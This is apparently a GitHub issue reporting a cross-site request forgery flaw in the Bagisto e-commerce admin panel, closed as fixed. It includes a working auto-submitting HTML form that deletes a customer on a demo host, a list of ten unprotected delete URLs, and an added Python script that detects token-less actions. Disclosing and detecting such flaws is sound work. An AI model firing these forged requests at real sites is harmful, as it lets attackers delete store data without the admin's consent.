Cross site request forgery #750

Closed
VikramRajVashisth opened this issue Mar 27, 2019 · 1 comment

Comments

@VikramRajVashisth

commented Mar 27, 2019

Vulnerable link: https://demo.bagisto.com/bagisto-103-206-131-18/admin/

What is CSRF?
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application.
Vulnerable page: Admin Panel menu

Task: To remove items from the table without the account owner's consent.
How to detect the vulnerability?
It is fairly easy to detect a CSRF vulnerability via automated tools or code analysis. Here, we will directly look at the href URLs of the Delete button, which submits the value without a CSRF token, using Inspect Element in the browser.

How to reproduce the attack?
Step 1: Admin (victim) signs into the Bagisto admin panel and does not sign off or close the browser.
Step 2: Admin (victim) opens a tab (an attacker-controlled website with an auto-loading request containing the information the attacker wants to delete); the details of the request are sent to the Bagisto server, and the evil script auto-loads to delete items from the list.
Step 3: The browser executes the evil script on the attacker's behalf and updates the list.

Malicious page containing the evil script to edit the list:
1.1) Delete users on the admin panel: no CSRF token is used on the customer delete button.
The attacker needs to send a link to a page containing the code below, which will be executed when opened in the victim's browser.


<html>
<body onload="document.forms[0].submit()">
<!-- Submitted automatically on load. The browser attaches the victim's admin
     session cookie, so this GET reaches the delete route as the logged-in admin.
     No token is needed because the route accepts a plain GET. -->
<form method="get" action="https://demo.bagisto.com/bagisto-103-206-131-18/admin/customers/delete/10">
<input value="Save Changes" type="submit">
</form>
</body>
</html>

1.2) Deleting review on admin panel:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/reviews/delete/4
1.3) Deleting group:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/groups/delete/1
1.4) Locales:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/locales/delete/2
1.5) Currencies:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/currencies/delete/2
1.6) Exchange rates:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/exchange_rates/delete/2
1.7) Inventory sources:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/inventory_sources/delete/1
1.8) Channels:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/channels/delete/1
1.9) Users:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/users/delete/1
1.10) Sliders:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/slider/delete/1

Impacts of the vulnerability:
Using this flaw, an attacker can remove important functionality of the application, which results in denial of most of the services on the store.

Prevention Cheat sheet for developers:
https://www.incapsula.com/web-application-security/csrf-cross-site-request-forgery.html
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
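
The detection step in the report above is done by hand: open the admin page, inspect the Delete button, and check whether it is a bare link. The following script is an added example (not code from the issue, and not Bagisto's own code) that performs the same check over page markup: it flags any link whose path carries a state-changing verb (a GET side effect, which no token can protect), any GET form with such an action, and any POST/PUT/PATCH/DELETE form that carries no token field. The verb list and the token field names (`_token` is Laravel's) are assumptions, and the sample admin page is constructed to resemble the vulnerable and the fixed markup; it was not captured from demo.bagisto.com.

```python
"""Audit an admin page for state-changing actions reachable without a CSRF token.

Added example, not code from the issue or from Bagisto. Findings are
(kind, target, reason) tuples.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Path fragments treated as state-changing (assumed; extend per application).
STATE_CHANGING_VERBS = ("/delete/", "/destroy/", "/remove/", "/update/", "/toggle/")
# Hidden-field names that carry a synchronizer token (Laravel, generic, Django).
TOKEN_FIELDS = {"_token", "csrf_token", "csrfmiddlewaretoken"}
WRITE_METHODS = {"post", "put", "patch", "delete"}


def _is_state_changing(url):
    path = urlparse(url).path.lower()
    return any(verb in path for verb in STATE_CHANGING_VERBS)


class CsrfAuditParser(HTMLParser):
    """Walks the page and records every forgeable state-changing action."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._form = None  # attributes of the <form> currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            href = a.get("href") or ""
            if _is_state_changing(href):
                self.findings.append(("GET link", href, "state change via plain link; no token possible"))
        elif tag == "form":
            self._form = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "override": None,  # Laravel's _method spoofing field, if present
                "has_token": False,
            }
        elif tag == "input" and self._form is not None:
            name = a.get("name") or ""
            if name in TOKEN_FIELDS:
                self._form["has_token"] = True
            elif name == "_method":
                self._form["override"] = (a.get("value") or "").lower()

    def handle_endtag(self, tag):
        if tag != "form" or self._form is None:
            return
        form, self._form = self._form, None
        effective = form["override"] or form["method"]
        if form["method"] == "get" and _is_state_changing(form["action"]):
            self.findings.append(("GET form", form["action"], "state change via GET; browser sends no token"))
        elif effective in WRITE_METHODS and not form["has_token"]:
            self.findings.append(("%s form" % effective.upper(), form["action"], "no CSRF token field"))


def audit(html):
    """Return the list of unprotected state-changing actions found in html."""
    parser = CsrfAuditParser()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: the plain-link delete from the report, a token-bearing
# POST form (the safe shape), a harmless GET search form, and a POST form
# that forgot the token.
SAMPLE_ADMIN_PAGE = """
<table>
<tr><td>customer 10</td><td>
  <a href="https://demo.bagisto.com/bagisto-103-206-131-18/admin/customers/delete/10">Delete</a>
</td></tr>
<tr><td>customer 11</td><td>
  <form method="POST" action="/admin/customers/delete/11">
    <input type="hidden" name="_token" value="constructed-session-bound-token">
    <input type="hidden" name="_method" value="DELETE">
    <button type="submit">Delete</button>
  </form>
</td></tr>
<tr><td>search</td><td>
  <form method="get" action="/admin/customers"><input name="q"><button>Go</button></form>
</td></tr>
<tr><td>bulk</td><td>
  <form method="post" action="/admin/customers/mass-destroy">
    <input type="hidden" name="indexes" value="1,2,3">
  </form>
</td></tr>
</table>
"""

if __name__ == "__main__":
    for kind, target, reason in audit(SAMPLE_ADMIN_PAGE):
        print("%-10s %-75s %s" % (kind, target, reason))
```

Run against the constructed page it reports two findings: the bare link to `/customers/delete/10` and the token-less POST to `/admin/customers/mass-destroy`; the POST form carrying `_token` and the GET search form pass. The reason a GET link is reported unconditionally is the root of the issue: Bagisto is built on Laravel, and Laravel's `VerifyCsrfToken` middleware skips GET, HEAD and OPTIONS requests entirely, so a delete route bound to GET cannot be protected by a token at all; it has to move to a POST (or `_method`-spoofed DELETE) form that carries the `_token` field.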

@rahulshukla-webkul rahulshukla-webkul added this to High priority in Issues Dashboard Mar 28, 2019
prashant-webkul added a commit to prashant-webkul/bagisto that referenced this issue Apr 9, 2019
@prashant-webkul prashant-webkul moved this from High priority to Fixed but waiting for release in Issues Dashboard Apr 9, 2019
@jyoti-webkul

Collaborator

commented Apr 12, 2019

Framework Version: 0.1.5
Fixed

Issues Dashboard automation moved this from Fixed but waiting for release to Closed Apr 12, 2019